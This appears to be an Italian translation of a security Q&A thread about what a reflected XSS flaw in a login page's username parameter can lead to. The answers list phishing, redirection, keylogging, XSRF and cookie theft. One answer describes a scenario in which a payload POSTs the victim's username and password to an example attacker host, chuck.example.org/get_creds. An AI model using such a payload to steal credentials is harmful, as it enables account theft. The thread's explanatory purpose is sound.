Quali possono essere gli effetti dell'XSS riflesso sulla pagina di accesso?

Naviga le tue risposte
1

Sono un principiante in WASA. Quali sono i probabili effetti negativi di una vulnerabilità XSS riflessa nella pagina di accesso? Diciamo che il riflesso XSS è identificato nel parametro username nella pagina di accesso.

    
posta Muthu Kumaran 22.09.2016 - 11:22
fonte

2 risposte

2

L'inserimento del codice in una pagina può portare a molte cose. Pochi di questi sono:

  1. Porta a attacchi di phishing
  2. Il reindirizzamento
  3. È possibile creare un keylogger
  4. XSRF
  5. Ottieni dati da variabili JS e cookie non HTTPonly
risposta data 29.09.2016 - 10:50
fonte
1
  1. Chuck invia alle loro vittime un link al sito di destinazione ( example.com , contenente un carico utile XSS nella stringa della query).
  2. Mario fa clic sul link.
  3. Bob controlla la barra degli indirizzi per accertarsi che sia il protocollo https , il lucchetto e il dominio previsto.
  4. Mentre la barra degli indirizzi mostra https://example.com , Bob procede al login.
  5. Facendo clic sul pulsante Login , il payload di Chuck viene eseguito e invia il nome utente e la password di Bob al sito Web di Chuck utilizzando una richiesta AJAX:
    • POST https://chuck.example.org/get_creds
    • username=bob&password=baseball
risposta data 29.09.2016 - 15:57
fonte

Leggi altre domande sui tag

Isolare il server Raspberry Pi Cosa significa C = il significato / significato in OpenSSL e questo errore?